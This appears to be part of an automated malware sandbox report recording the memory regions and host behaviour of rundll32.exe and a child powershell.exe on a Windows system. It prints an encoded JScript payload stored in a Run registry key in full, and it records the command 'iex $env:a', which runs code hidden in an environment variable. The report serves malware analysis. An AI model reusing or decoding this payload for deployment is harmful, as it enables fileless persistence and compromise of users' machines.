scrrun.dll 0x01ee0000 0x01eeffff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x0000000001ef0000 0x01ef0000 0x01ef0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000001f00000 0x01f00000 0x01f01fff Pagefile Backed Memory Readable True False False
  • Region Actions
cversions.1.db 0x01f10000 0x01f13fff Memory Mapped File Readable True False False
  • Region Actions
cversions.2.db 0x01f10000 0x01f13fff Memory Mapped File Readable True False False
  • Region Actions
pagefile_0x0000000001f20000 0x01f20000 0x01f20fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000001f30000 0x01f30000 0x01faffff Private Memory Readable, Writable True True False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db 0x01fb0000 0x01fcafff Memory Mapped File Readable True False False
  • Region Actions
cversions.2.db 0x01fd0000 0x01fd3fff Memory Mapped File Readable True False False
  • Region Actions
private_0x0000000001fe0000 0x01fe0000 0x0205ffff Private Memory Readable, Writable True True False
pagefile_0x0000000002060000 0x02060000 0x0213efff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000002160000 0x02160000 0x021dffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x00000000021e0000 0x021e0000 0x025d2fff Pagefile Backed Memory Readable True False False
  • Region Actions
sortdefault.nls 0x025e0000 0x028aefff Memory Mapped File Readable False False False
  • Region Actions
private_0x00000000028b0000 0x028b0000 0x029affff Private Memory Readable, Writable True True False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db 0x029b0000 0x029dffff Memory Mapped File Readable True False False
  • Region Actions
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x029e0000 0x02a45fff Memory Mapped File Readable True False False
  • Region Actions
private_0x0000000002a90000 0x02a90000 0x02b0ffff Private Memory Readable, Writable True True False
private_0x0000000002b80000 0x02b80000 0x02bfffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002c50000 0x02c50000 0x02ccffff Private Memory Readable, Writable True True False
private_0x0000000002cd0000 0x02cd0000 0x02d4ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002d50000 0x02d50000 0x02dcffff Private Memory Readable, Writable True False False
  • Region Actions
ieframe.dll 0x02dd0000 0x03986fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x0000000003990000 0x03990000 0x03a8ffff Private Memory Readable, Writable True True False
private_0x0000000003a90000 0x03a90000 0x03b90fff Private Memory Readable, Writable True True False
private_0x0000000003bf0000 0x03bf0000 0x03c6ffff Private Memory Readable, Writable True False False
  • Region Actions
staticcache.dat 0x03c70000 0x0459ffff Memory Mapped File Readable False False False
  • Region Actions
user32.dll 0x77860000 0x77959fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x77960000 0x77a7efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77a80000 0x77c28fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
psapi.dll 0x77c50000 0x77c56fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
rundll32.exe 0xff9f0000 0xff9fefff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
jscript.dll 0x7fef4900000 0x7fef49e2fff Memory Mapped File Readable, Writable, Executable True False False
  • Region Actions
ieframe.dll 0x7fef49f0000 0x7fef55a6fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleacc.dll 0x7fef55b0000 0x7fef5603fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mshtml.dll 0x7fef63d0000 0x7fef6c67fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msls31.dll 0x7fef73a0000 0x7fef73dafff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
mpr.dll 0x7fefacb0000 0x7fefacc7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
scrrun.dll 0x7fefada0000 0x7fefadd3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wshom.ocx 0x7fefb060000 0x7fefb087fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msimtf.dll 0x7fefb090000 0x7fefb09dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dwmapi.dll 0x7fefb400000 0x7fefb417fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
uxtheme.dll 0x7fefb860000 0x7fefb8b5fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
propsys.dll 0x7fefc350000 0x7fefc47bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
comctl32.dll 0x7fefc4d0000 0x7fefc6c3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntmarta.dll 0x7fefc9c0000 0x7fefc9ecfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
version.dll 0x7fefcb90000 0x7fefcb9bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rsaenh.dll 0x7fefcfc0000 0x7fefd006fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptsp.dll 0x7fefd2c0000 0x7fefd2d6fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x7fefd890000 0x7fefd8b4fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x7fefd8c0000 0x7fefd8cefff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sxs.dll 0x7fefd8d0000 0x7fefd960fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrtremote.dll 0x7fefd9b0000 0x7fefd9c3fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
profapi.dll 0x7fefd9d0000 0x7fefd9defff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msasn1.dll 0x7fefda70000 0x7fefda7efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
crypt32.dll 0x7fefdb20000 0x7fefdc86fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x7fefdc90000 0x7fefdcfafff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cfgmgr32.dll 0x7fefdd00000 0x7fefdd35fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
devobj.dll 0x7fefdd40000 0x7fefdd59fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x7fefdda0000 0x7fefde3efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shell32.dll 0x7fefde40000 0x7fefebc7fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x7fefebd0000 0x7fefecfcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x7fefed00000 0x7fefed2dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x7fefed30000 0x7fefed96fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imagehlp.dll 0x7fefeda0000 0x7fefedb6fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
clbcatq.dll 0x7fefee10000 0x7fefeea8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x7fefeeb0000 0x7fefefb8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
usp10.dll 0x7fefefc0000 0x7feff088fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wininet.dll 0x7feff110000 0x7feff239fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wldap32.dll 0x7feff240000 0x7feff291fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x7feff2a0000 0x7feff2befff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
lpk.dll 0x7feff2c0000 0x7feff2cdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x7feff2d0000 0x7feff3aafff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
oleaut32.dll 0x7feff3b0000 0x7feff486fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x7feff490000 0x7feff500fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
iertutil.dll 0x7feff5b0000 0x7feff808fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
urlmon.dll 0x7feff810000 0x7feff987fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ole32.dll 0x7feff990000 0x7feffb92fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
setupapi.dll 0x7feffba0000 0x7feffd76fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
apisetschema.dll 0x7feffda0000 0x7feffda0fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x000007fffffac000 0x7fffffac000 0x7fffffadfff Private Memory Readable, Writable True True False
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True True False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd5fff Private Memory Readable, Writable True True False
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd7fff Private Memory Readable, Writable True True False
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd8fff Private Memory Readable, Writable True True False
private_0x000007fffffda000 0x7fffffda000 0x7fffffdbfff Private Memory Readable, Writable True True False
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffddfff Private Memory Readable, Writable True True False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True True False
Host Behavior
Registry (4)
+
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKCU\software\microsoft\windows\currentversion\run\ data = #@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. }CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA True 1
Fn
Module (14)
+
Operation Module Additional Information Success Count Logfile
Load ADVAPI32.dll base_address = 0x7feff2d0000 True 1
Fn
Load ole32.dll base_address = 0x7feff990000 True 1
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7feff990000 True 2
Fn
Get Filename process_name = c:\windows\system32\rundll32.exe, file_name_orig = C:\Windows\System32\rundll32.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x77a9f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7feff2eb5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7feff2ec480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7feff2f0710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7feff9ac920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7feff9b7490 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x7feff9aa4c4 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetClassObject, address_out = 0x7feff9c2e18 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = UnregisterTraceGuids, address_out = 0x77aa3c80 True 1
Fn
COM (10)
+
Operation Additional Information Success Count Logfile
Get Class ID cls_id = 72C24DD5-D70A-438B-8A42-98424B88AFB8, prog_id = WScript.Shell True 2
Fn
Get Class ID cls_id = 0D43FE01-F093-11CF-8940-00A0C9054228, prog_id = Scripting.FileSystemObject True 1
Fn
Create interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER True 3
Fn
Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 2
Fn
Create interface = 00000001-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
System (2)
+
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2017-08-21 16:00:16 (UTC) True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
+
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 2
Fn
Process #6: powershell.exe
(Host: 695, Network: 0)
+
Information Value
ID #6
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line "C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe" iex $env:a
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:23, Reason: Child Process
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:00:49
OS Process Information
+
Information Value
PID 0x578
Parent PID 0x674 (c:\windows\system32\rundll32.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f4f9 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 5C4
0x 600
0x 63C
0x 50C
0x 278
0x 66C
0x 174
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False
  • Region Actions
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
powershell.exe.mui 0x00080000 0x00082fff Memory Mapped File Readable, Writable False False False
  • Region Actions
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True True False
private_0x00000000000a0000 0x000a0000 0x000a0fff Private Memory Readable, Writable True True False
private_0x00000000000b0000 0x000b0000 0x000effff Private Memory Readable, Writable True True False
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000000100000 0x00100000 0x0013ffff Private Memory Readable, Writable True True False
locale.nls 0x00140000 0x001a6fff Memory Mapped File Readable False False False
  • Region Actions
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000001c0000 0x001c0000 0x001c1fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x00000000001e0000 0x001e0000 0x0025ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000260000 0x00260000 0x00261fff Pagefile Backed Memory Readable True False False
  • Region Actions
cversions.2.db 0x00270000 0x00273fff Memory Mapped File Readable True False False
  • Region Actions
pagefile_0x0000000000280000 0x00280000 0x00280fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000000290000 0x00290000 0x002cffff Private Memory Readable, Writable True False False
  • Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db 0x002d0000 0x002eafff Memory Mapped File Readable True False False
  • Region Actions
cversions.2.db 0x002f0000 0x002f3fff Memory Mapped File Readable True False False
  • Region Actions
private_0x0000000000300000 0x00300000 0x003fffff Private Memory Readable, Writable True True False
private_0x0000000000400000 0x00400000 0x004fffff Private Memory Readable, Writable True True False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db 0x00500000 0x0052ffff Memory Mapped File Readable True False False
  • Region Actions
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x00530000 0x00595fff Memory Mapped File Readable True False False
  • Region Actions
pagefile_0x00000000005a0000 0x005a0000 0x005a0fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000005b0000 0x005b0000 0x005b0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x00000000005c0000 0x005c0000 0x005cffff Private Memory Readable, Writable True True False
pagefile_0x00000000005d0000 0x005d0000 0x00757fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000760000 0x00760000 0x008e0fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x00000000008f0000 0x008f0000 0x01ceffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000001cf0000 0x01cf0000 0x01deffff Private Memory Readable, Writable True True False
pagefile_0x0000000001df0000 0x01df0000 0x01ecefff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000001ed0000 0x01ed0000 0x01edffff Private Memory Readable, Writable True True False
pagefile_0x0000000001ee0000 0x01ee0000 0x01ee0fff Pagefile Backed Memory Readable, Writable True False False
  • Region Actions
private_0x0000000001ef0000 0x01ef0000 0x01f2ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000001f30000 0x01f30000 0x01f3ffff Private Memory True True False
private_0x0000000001f40000 0x01f40000 0x01f4ffff Private Memory True False False
  • Region Actions
private_0x0000000001f50000 0x01f50000 0x01f8ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000001f90000 0x01f90000 0x01f9ffff Private Memory True True False
private_0x0000000001fa0000 0x01fa0000 0x01faffff Private Memory True False False
  • Region Actions
private_0x0000000001fb0000 0x01fb0000 0x01feffff Private Memory Readable, Writable, Executable True True False
private_0x0000000001ff0000 0x01ff0000 0x01ffffff Private Memory True True False
private_0x0000000002000000 0x02000000 0x0200ffff Private Memory True True False
private_0x0000000002010000 0x02010000 0x0201ffff Private Memory Readable, Writable True True False
l_intl.nls 0x02020000 0x02022fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000002030000 0x02030000 0x02030fff Private Memory Readable, Writable True True False
private_0x0000000002040000 0x02040000 0x0207ffff Private Memory Readable, Writable True False False
  • Region Actions
